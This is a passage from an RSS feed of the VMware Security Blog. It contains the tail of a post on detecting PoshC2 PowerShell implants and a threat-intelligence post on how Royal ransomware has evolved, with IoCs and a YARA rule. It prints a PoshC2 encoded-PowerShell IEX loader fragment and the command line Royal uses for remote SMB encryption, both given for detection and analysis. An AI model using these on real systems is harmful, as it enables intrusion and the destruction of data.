data-contrast="none">6</span></i>< ]]>
<![CDATA[ i><span data-contrast="none">: URI and network keys change after each
build.</span></i></p> <p><span data-contrast="auto">While the encryption keys
are generated on the fly, the URI, as mentioned earlier, is randomly taken from
the file PoshC2/resources/urls.txt (see </span><span data-contrast="auto ]]>
<![CDATA[ ">Figure 5</span><span data-contrast="auto">). These few changes in
the source code cause a drastic effect on the Base64-encoded PowerShell command,
as the output of the KDiff3</span> <span data-contrast="auto">tool highlights in
</span><span data-contrast="auto">Figure 7</span><span data-contrast=" ]]>
<![CDATA[ auto">.</span></p> <p><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.04.09-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83412"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.04.09-PM-1024x464.png"
alt=" ]]>
<![CDATA[ " width="800" height="362"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.04.09-PM-1024x464.png
1024w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.04.09-PM-300x136.png
300w, https://blogs.vmware.com/security/files/2023/03/Screen-Sh ]]>
<![CDATA[ ot-2023-03-24-at-1.04.09-PM-768x348.png 768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.04.09-PM-1536x696.png
1536w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-24-at-1.04.09-PM-600x272.png
600w, https://blogs.vmware.com/security/files/2023/0 ]]>
<![CDATA[ 3/Screen-Shot-2023-03-24-at-1.04.09-PM.png 1886w" sizes="(max-width:
800px) 100vw, 800px" /></a></p> <p><em><span class="TextRun SCXW189884544 BCX2"
lang="EN-US" xml:lang="EN-US" data-contrast="none"><span class="NormalTextRun
SCXW189884544 BCX2" data-ccp-parastyle="caption">Figure </span></span><sp ]]>
<![CDATA[ an class="FieldRange SCXW189884544 BCX2"><span class="TextRun
SCXW189884544 BCX2" lang="EN-US" xml:lang="EN-US" data-contrast="none"><span
class="NormalTextRun SCXW189884544 BCX2"
data-ccp-parastyle="caption">7</span></span></span><span class="TextRun
SCXW189884544 BCX2" lang="EN-US" xml:lang="EN-US ]]>
<![CDATA[ " data-contrast="none"><span class="NormalTextRun SCXW189884544 BCX2"
data-ccp-parastyle="caption">: Two different</span><span class="NormalTextRun
SCXW189884544 BCX2" data-ccp-parastyle="caption"> builds of</span><span
class="NormalTextRun SCXW189884544 BCX2" data-ccp-parastyle="caption"> payload.b
]]>
<![CDATA[ at file</span><span class="NormalTextRun SCXW189884544 BCX2"
data-ccp-parastyle="caption"> with the </span><span class="NormalTextRun
SCXW189884544 BCX2" data-ccp-parastyle="caption">same configuration</span><span
class="NormalTextRun SCXW189884544 BCX2" data-ccp-parastyle="caption">, but
different ]]>
<![CDATA[ </span><span class="NormalTextRun SCXW189884544 BCX2"
data-ccp-parastyle="caption">crypto keys</span><span class="NormalTextRun
SCXW189884544 BCX2" data-ccp-parastyle="caption"> and URI</span><span
class="NormalTextRun SCXW189884544 BCX2"
data-ccp-parastyle="caption">.</span></span></em></p> <p><spa ]]>
<![CDATA[ n data-contrast="auto">The beginning of the Base64-encoded code in
payload.bat, however, is bound to remain the same, making it a suitable
candidate for a detection signature. When decoded, that fragment corresponds to
the following PowerShell code:</span><span
data-ccp-props="{&quot;201341983&quot; ]]>
<![CDATA[ :0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><strong><i>IEX(New-Object
IO.StreamReader((New-ObjectSystem.IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String(&#8216;</i></strong></p>
<h2 aria-level="1"><span data-contrast="none">Conclusions</span><span ]]>
<![CDATA[
data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}"> </span></h2>
<p><span data-contrast="auto">In this blog post, we showed how to use PoshC2 to
generate PowerShell implants and ]]>
<![CDATA[ stagers. We also explained how proxy tools (such as mshta.exe or
regsvr32.exe) are often used to further increase the complexity of the delivery
process, making detection a challenging task. The last section analyzed the
PowerShell implant and detailed the underlying logic.</span><span data-ccp-pro
]]>
<![CDATA[
ps="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<p><span data-contrast="auto">Throughout the whole article, we identified the
following IoCs to detect PoshC2 PowerShell implants:</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></p>
<ol> <li><span data-contrast="auto">Usage of System Binary Proxy Execution
technique (MITRE ID </span><a
href="https://attack.mitre.org/techniques/T1218/"><span
data-contrast="none">T1218</span></a><span data-contrast="auto">).</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li><span data-contrast="auto">Presence of PoshC2 specific keywords (URIs from
urls.txt; code snippets; Base64 strings).</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li><span data-contrast="auto">Execution of powershell.exe with long
Base64-encoded commands.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
<li><span data-contrast="auto">Usage of self-signed SSL certificates in network
communications.</span><span
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"> </span></li>
</ol> <p><span data-contrast="auto">To help security researchers, we created
YARA rules for the PowerShell stager and the PowerShell implant. They are all
available <a href="https://github.com/vmware-samples/tau-research">in our
repository</a>.</span></p><p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/03/how-to-detect-poshc2-powershell-implants.html">How
to Detect PoshC2 PowerShell Implants</a> appeared first on <a rel="nofollow"
href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]>
...
</content:encoded>
...
</item>
<item>
<title>Unveiling the Evolution of Royal Ransomware</title>
<link>https://blogs.vmware.com/security/2023/03/unveiling-the-evolution-of-royal-ransomware.html?utm_source=rss&utm_medium=rss&utm_campaign=unveiling-the-evolution-of-royal-ransomware</link>
<dc:creator>
<![CDATA[ Deborah Snyder, Tatiana Vollbrecht, Kyle Shafto and Dana Behling ]]>
...
</dc:creator>
<pubDate>Thu, 16 Mar 2023 20:11:57 +0000</pubDate>
<category>
<![CDATA[ Threat Intelligence ]]>
...
</category>
<guid isPermaLink="false">https://blogs.vmware.com/security/?p=83390</guid>
<description>
<![CDATA[ <div><img width="300" height="162"
src="https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-300x162.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-300x162.png
300w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-1024x555.png
1024w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-768x416.png
768w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-1536x832.png
1536w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-410x222.png
410w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-600x325.png
600w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-415x225.png
415w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-585x318.png
585w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-380x207.png
380w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-222x120.png
222w, https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured.png
1710w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>While the evolution
of ransomware techniques is to be expected, the speed at which the Royal
Ransomware Group has been able to adapt is impressive. Since it was first
reported, those responsible for Royal ransomware have advanced quickly over a
short period of time, leveraging old and new techniques as well as exploiting
novel vulnerabilities &#8230; <a
href="https://blogs.vmware.com/security/2023/03/unveiling-the-evolution-of-royal-ransomware.html">Continued</a></p>
<p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/03/unveiling-the-evolution-of-royal-ransomware.html">Unveiling
the Evolution of Royal Ransomware</a> appeared first on <a rel="nofollow"
href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]>
...
</description>
<content:encoded>
<![CDATA[ <div><img width="300" height="162"
src="https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-300x162.png"
class="attachment-medium size-medium wp-post-image" alt="" decoding="async"
loading="lazy" style="margin-bottom: 10px;"
srcset="https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-300x162.png
300w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-1024x555.png
1024w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-768x416.png
768w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-1536x832.png
1536w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-410x222.png
410w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-600x325.png
600w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-415x225.png
415w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-585x318.png
585w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-380x207.png
380w,
https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured-222x120.png
222w, https://blogs.vmware.com/security/files/2022/03/Ransomware-2C_Featured.png
1710w" sizes="(max-width: 300px) 100vw, 300px" /></div><p>While the evolution of
ransomware techniques is to be expected, the speed at which the Royal Ransomware
Group has been able to adapt is impressive. Since it was first reported, those
responsible for Royal ransomware have advanced quickly over a short period of
time, leveraging old and new techniques as well as exploiting novel
vulnerabilities as they are discovered. In just the last six months, they have
rapidly escalated attacks targeting victims across numerous industries and
countries.</p> <p>The Royal Ransomware Group has also leveraged evasion
techniques such as Virtual Instances <a
href="https://attack.mitre.org/techniques/T1564/006/">[1]</a>, which made it
challenging for defenders to prevent encryption once the threat actor had gained
access to the targeted victim environment. Interestingly, some of the attributes
were reminiscent of an older 2020 sample of Conti ransomware. External research
by Vitali Kremez from AdvIntel has stated a direct relationship between Conti
and Royal ransomware [<a
href="https://twitter.com/VK_Intel/status/1557003350541242369">2</a>]. Comparing
a recent Royal sample against Conti’s and other Royal ransomware variants over
the past six months could provide insight into the threat actors’ future
activity.</p> <h2><strong>Who is Royal Ransomware?</strong></h2> <p>Initially
identified as Zeon in January of 2022, Royal ransomware has been rebranded as
“Royal” since September of 2022 <a
href="https://www.bleepingcomputer.com/news/security/ransomware-gangs-move-to-callback-social-engineering-attacks/">[3]</a>.
Since then, they have targeted companies across numerous industries such as
Manufacturing, Healthcare, Food, and Education. Although over 60% of targeted
companies have been in the United States, the Royal Ransomware Group has not
shied away from targeting countries around the world including Europe and Latin
America.</p> <p><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.03.37-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83398"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.03.37-PM-1024x416.png"
alt="" width="800" height="325"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.03.37-PM-1024x416.png
1024w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.03.37-PM-300x122.png
300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.03.37-PM-768x312.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.03.37-PM-1536x624.png
1536w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.03.37-PM-600x244.png
600w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.03.37-PM.png
1606w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><strong><em>Figure
1: </em></strong><em>Graph of Industries Targeted by the Royal Ransomware Group
collected via their Leak Site from September 2022 &#8211; February
2023.</em></p> <p>Over the past six months, the Royal Ransomware Group has
targeted both small and large companies. In December of 2022, there appeared to
be a clear pivot to targeting larger companies and a steady decline in targeting
smaller organizations. There has also been an overall decline in the number of
reported attacks in the first quarter of 2023.</p> <p><em><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.02.48-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83397"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.02.48-PM-1024x634.png"
alt="" width="800" height="495"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.02.48-PM-1024x634.png
1024w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.02.48-PM-300x186.png
300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.02.48-PM-768x475.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.02.48-PM-1536x950.png
1536w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.02.48-PM-600x371.png
600w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.02.48-PM.png
1584w" sizes="(max-width: 800px) 100vw, 800px" /></a></em></p>
<p><strong><em>Figure 2:</em></strong><em> Line Chart summarizing the Size of
Targeted Companies collected via their Leak Site from September 2022 &#8211;
February 2023. </em></p> <p>With each new variant of Royal ransomware since
September comes different techniques and features, old and new such as:</p> <ul>
<li>Callback phishing (BazarCall) <a
href="https://www.bleepingcomputer.com/news/security/ransomware-gangs-move-to-callback-social-engineering-attacks/">[3]</a></li>
<li>File encryption over SMB</li> <li>Expansive LOLbin utilization</li>
<li>Rapid abuse of new vulnerabilities such as CVE-2022-27510 <a
href="https://www.techrepublic.com/article/royal-ransomware-linux-vmware-esxi/">[4]
</a></li> <li>Leveraging popular malware and tools such as Qbot, Batloader,
Cobalt Strike, etc.</li> </ul> <p><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.01.41-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83396"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.01.41-PM-1024x372.png"
alt="" width="800" height="290"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.01.41-PM-1024x372.png
1024w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.01.41-PM-300x109.png
300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.01.41-PM-768x279.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.01.41-PM-1536x558.png
1536w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.01.41-PM-600x218.png
600w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-1.01.41-PM.png
1548w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><strong><em>Figure
3:</em></strong><em> Timeline of major changes observed with Royal ransomware
over the last six months as reported by security researchers  [</em><a
href="https://www.bleepingcomputer.com/news/security/ransomware-gangs-move-to-callback-social-engineering-attacks/"><em>3</em></a><em>]
[</em><a
href="https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html"><em>8</em></a><em>]</em></p>
<h2>A Royal Delivery</h2> <p>VMware Carbon Black’s Threat Analysis Unit (TAU)
recently investigated a Royal ransomware attack leveraging file encryption over
SMB. The threat actor was able to gain access to a customer’s environment and
remotely encrypt files across five devices. Unlike what has previously been seen
by the Royal Ransomware Group <a
href="https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive">[5]</a>,
the threat actor did not disable the antivirus/EDR and did not delete volume
shadow copies. These actions may have been omitted to avoid alerting any sensors
or to avoid being blocked, but it is important to consider that the sample
itself has the ability to delete volume shadow copies.</p> <p>To begin, Carbon
Black was informed that the threat actor gained access to Server A and spun up a
Virtual Machine (VM). From that VM, they successfully connected back to the host
device via SMB as well as five additional servers.</p> <p><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.59.54-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83395"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.59.54-PM.png"
alt="" width="800" height="421"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.59.54-PM.png
940w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.59.54-PM-300x158.png
300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.59.54-PM-768x404.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.59.54-PM-600x316.png
600w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><strong><em>Figure
4:</em></strong><em> Diagram summarizing the flow of events in the Royal
ransomware attack in the customer environment.</em></p> <p>Shortly after gaining
access to each server, the remote file encryption began. Royal ransomware must
be executed via command line by a threat actor actively within the target
environment. To remotely encrypt a server, the threat actor uses the IP address
and targeted drive in the command line as shown:</p>
<p><strong><em>[RansomwareName].exe -ep 5 -path \\XXX.XXX.XXX.XXX\C$ -id [32
char string]”</em></strong></p> <p>This activity masquerades as routine system
activity. Additionally, with the threat actor using a newly created VM without a
sensor installed, some malicious activity on the device could go undetected.</p>
<h2>Conti Ransomware in Retrospect</h2> <p>The investigated Royal ransomware
attack revealed features previously identified in Conti ransomware [<a
href="https://blogs.vmware.com/security/2020/07/tau-threat-discovery-conti-ransomware.html">6</a>].
Like Royal ransomware, Conti is designed to be executed by an adversary
monitoring the environment. In 2020, it used a similar command line execution to
target local drives, network shares, and even specific IP addresses. Upon deeper
analysis, there are numerous similarities that were seen between this 2020 Conti
sample and our 2023 sample of Royal ransomware.</p> <p><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.58.52-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83394"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.58.52-PM.png"
alt="" width="800" height="638"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.58.52-PM.png
799w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.58.52-PM-300x239.png
300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.58.52-PM-768x612.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.58.52-PM-600x478.png
600w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><strong><em>Figure
5:</em></strong><em> Venn Diagram comparing the 2020 Conti sample with 2023
Royal ransomware sample </em>[<a
href="https://blogs.vmware.com/security/2020/07/tau-threat-discovery-conti-ransomware.html">6</a>]</p>
<p>Of the similarities, the most notable would be the use of:</p> <ul>
<li>Encryption threading to speed up encryption</li> <li>Windows Restart Manager
to kill processes using files before encryption</li> <li>Network scanning to
identify network shares for encryption</li> <li>Filtering IP addresses to reduce
noise</li> <li>File encryption over SMB</li> <li>Command line execution with the
ability to specify local or network only</li> </ul> <p>One of the key
differences was the fact that the 2020 Conti sample was highly obfuscated using
a Conti mutex and unique encoding strings for API resolution, while the 2023
Royal sample did not have a mutex and often had commands in clear text. This
could be due to the Conti source code leak leaving no need to spend cycles
obfuscating the code if it is already public.</p> <h2>Where is Royal Now?</h2>
<p>Compared to a sample <a
href="https://www.cybereason.com/blog/royal-ransomware-analysis">[7]</a> seen in
late 2022, our sample of Royal ransomware had extra features to include two
additional command line arguments, two additional file extensions to avoid, and
a modified royal file extension to append to encrypted files. The command line
arguments that were added, “-localonly” and “-networkonly”, allowed the user to
specify whether to target the local host or scan and target network shares
instead of relying on a specified path.</p> <p><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.55-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83393"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.55-PM.png"
alt="" width="800" height="111"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.55-PM.png
907w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.55-PM-300x42.png
300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.55-PM-768x107.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.55-PM-600x83.png
600w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><strong><em>Figure
6:</em></strong><em> Screenshot of addition of command line arguments</em></p>
<p>The avoided file extensions identified were “.royal_w” and “.royal_u”. The
extension “.royal_w” was used to append to files after encryption, while the
purpose of “.royal_u” was not yet understood. In the past Royal ransomware
appended encrypted files simply with “.royal”, while the new sample used
“.royal_w”. It’s possible this change was utilized to evade detection in the
case a rule had been written based on previous indicators.</p> <p>More recently,
a new variant <a
href="https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html">[8]</a>
has been identified targeting Linux ESXi servers. Compared to our sample, this
new variant appended encrypted files with the “.royal_u” file extension, which
was foreshadowed in our sample. Replacing the “-localonly” and “-networkonly”
command line arguments with new arguments such as “stopvm” and added more file
extension exclusions.</p> <p><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.19-PM.png"><img
decoding="async" loading="lazy" class="alignnone size-full wp-image-83392"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.19-PM.png"
alt="" width="331" height="208"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.19-PM.png
331w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.19-PM-300x189.png
300w" sizes="(max-width: 331px) 100vw, 331px" /></a></p> <p><strong><em>Figure
7:</em></strong><em> Screenshot of .royal_u extension used by the Linux Variant
being foreshadowed in our sample</em></p> <h2>Detecting a Constantly Evolving
Threat</h2> <p>It is clear that the Royal Ransomware Group is comfortable with
quickly adjusting and evolving its ransomware to fit its target’s environments.
With three different variants in just three months, the importance to stay aware
of these changes to ensure proper detection is paramount.</p> <p>When executed
locally, Royal ransomware is successfully blocked in the Carbon Black EDR
product via Default Ransomware Policies for sensor versions 3.7 and up. However,
in the case of File Encryption over SMB or executing via a virtual machine, EDR
products may not have full visibility into portions of the network activity.</p>
<p>The Endpoint Standard product receives updates for known malicious hashes and
blocks all types of Known or Suspect malware files from executing through
behavioral analysis. While the initial execution may be able to circumvent
detection via a virtual machine, it is likely that when the malware runs, it
will trigger additional alerts that are indicators of a more complex attack.
This is a good reminder to ensure your network has detection capabilities across
the entirety of the environment so that even if some undetected malicious
activity does occur, it will still be blocked when threat actors attempt actions
external to that device.</p> <p>With evolving threats like these, products like
VMware Carbon Black’s Managed Detection and Response (MDR) can be the difference
between a fully encrypted network or a contained threat and adds a much-needed
human element that can react with the ever-changing environment on a daily
basis. The MDR team is comprised of highly trained analysts that specialize in
post-exploitation defense. The team tracks technique changes and fulfills a
crucial gap between sensor and hash reputation updates, as well as dramatically
reducing the turn-around time for detecting emerging threats. For Royal
Ransomware in particular, the MDR team has leveraged the insight gained through
our wide customer pool to automate queries for proactive threat hunting which
has helped customers contain the threat early during the initial infection,
drastically minimizing network impact and preventing data exfiltration.</p>
<p><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.56.00-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83391"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.56.00-PM.png"
alt="" width="800" height="407"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.56.00-PM.png
843w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.56.00-PM-300x153.png
300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.56.00-PM-768x391.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.56.00-PM-600x305.png
600w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><strong><em>Figure
8:</em></strong><em> Screenshot of Carbon Black Console Summary of Alert
Behaviors</em></p> <h2>Conclusion</h2> <p>Although it is expected for the threat
landscape to continue to evolve over time, Royal Ransomware has shown that it is
particularly worth keeping an eye on the threat actor in this case. With victims
targeted across numerous industries and countries, the Royal Ransomware Group
has demonstrated their ability to be pervasive, resourceful, and creative with
their implementations. The use of old and new techniques, and now expanding
their sights to Linux, Royal Ransomware has vastly increased its potential
targets due to these developments. It would be no surprise, if not expected, for
more adaptations in future variants to occur.</p> <p>In fact, upon finishing our
investigation our team detected new techniques in a more recent Royal ransomware
variant that fellow researchers at Red Canary [<a
href="https://redcanary.com/blog/detecting-msxsl-attacks/">10</a>] had
previously noted in 2018 involving a signed Microsoft binary called MSXSL.</p>
<h2><strong>Yara Rule</strong></h2> <table width="624"> <tbody> <tr> <td
width="624">rule royal_note_cmdln_fileext</p> <p>{</p> <p>meta:</p> <p>author =
&#8220;Carbon Black TAU&#8221; //bdana &amp; snyderd</p> <p>date =
&#8220;2023-Feb-28&#8221;</p> <p>description = &#8220;Identifies Royal
Ransomware Variant with -localonly and -networkonly options available for
command line execution&#8221;</p> <p>rule_version = 1</p> <p>yara_version =
&#8220;4.2.0&#8221;</p> <p>exemplar_hash =
972429ab773f3f31180430f6fedc8b93b43f0f8d49b9e2d0ef22ac8589744648</p>
<p>strings:</p> <p>$ransom_note = &#8220;If you are reading this, it means that
your system were hit by Royal ransomware.&#8221; ascii wide</p> <p>$cmdline_1 =
&#8220;-path&#8221; ascii wide</p> <p>$cmdline_2 = &#8220;-id&#8221; ascii
wide</p> <p>$cmdline_3 = &#8220;-ep&#8221; ascii wide</p> <p>$cmdline_4 =
&#8220;-localonly&#8221; ascii wide</p> <p>$cmdline_5 =
&#8220;-networkonly&#8221; ascii wide</p> <p>$file_ext_1 =
&#8220;.royal_u&#8221; ascii wide</p> <p>$file_ext_2 = &#8220;.royal_w&#8221;
ascii wide</p> <p>condition:</p> <p>all of them</p> <p>}</td> </tr> </tbody>
</table> <p>&nbsp;</p> <p><strong>References</strong></p> <p>[1] <a
href="https://attack.mitre.org/techniques/T1564/006/">Hide Artifacts: Run
Virtual Instance, Sub-technique T1564.006 &#8211; Enterprise | MITRE
ATT&amp;CK®</a></p> <p>[2] <a
href="https://twitter.com/VK_Intel/status/1557003350541242369">Vitali Kremez
Mind Map</a></p> <p>[3] <a
href="https://www.bleepingcomputer.com/news/security/ransomware-gangs-move-to-callback-social-engineering-attacks/">Ransomware
gangs move to &#8216;callback&#8217; social engineering attacks</a></p> <p>[4]
<a
href="https://www.techrepublic.com/article/royal-ransomware-linux-vmware-esxi/">Royal
ransomware spreads to Linux and VMware ESXi</a></p> <p>[5] <a
href="https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive">Royal
Ransomware Deep Dive | Kroll</a></p> <p>[6] <a
href="https://blogs.vmware.com/security/2020/07/tau-threat-discovery-conti-ransomware.html">TAU
Threat Discovery: Conti Ransomware &#8211; VMware Security Blog</a></p> <p>[7]
<a href="https://www.cybereason.com/blog/royal-ransomware-analysis">Royal
Rumble: Analysis of Royal Ransomware</a></p> <p>[8] <a
href="https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html">Royal
Ransomware Expands Attacks by Targeting Linux ESXi Servers</a></p> <p>[9] <a
href="https://www.bleepingcomputer.com/news/security/new-royal-ransomware-emerges-in-multi-million-dollar-attacks/">New
Royal Ransomware emerges in multi-million dollar attacks</a></p> <p>[10] <a
href="https://redcanary.com/blog/detecting-msxsl-attacks/">Detecting MSXSL Abuse
in the Wild</a></p> <p>&nbsp;</p> <p>&nbsp;</p><p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/03/unveiling-the-evolution-of-royal-ransomware.html">Unveiling
the Evolution of Royal Ransomware</a> appeared first on <a rel="nofollow"
href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]>
...
</content:encoded>
...
</item>
...
</channel>
...
</rss>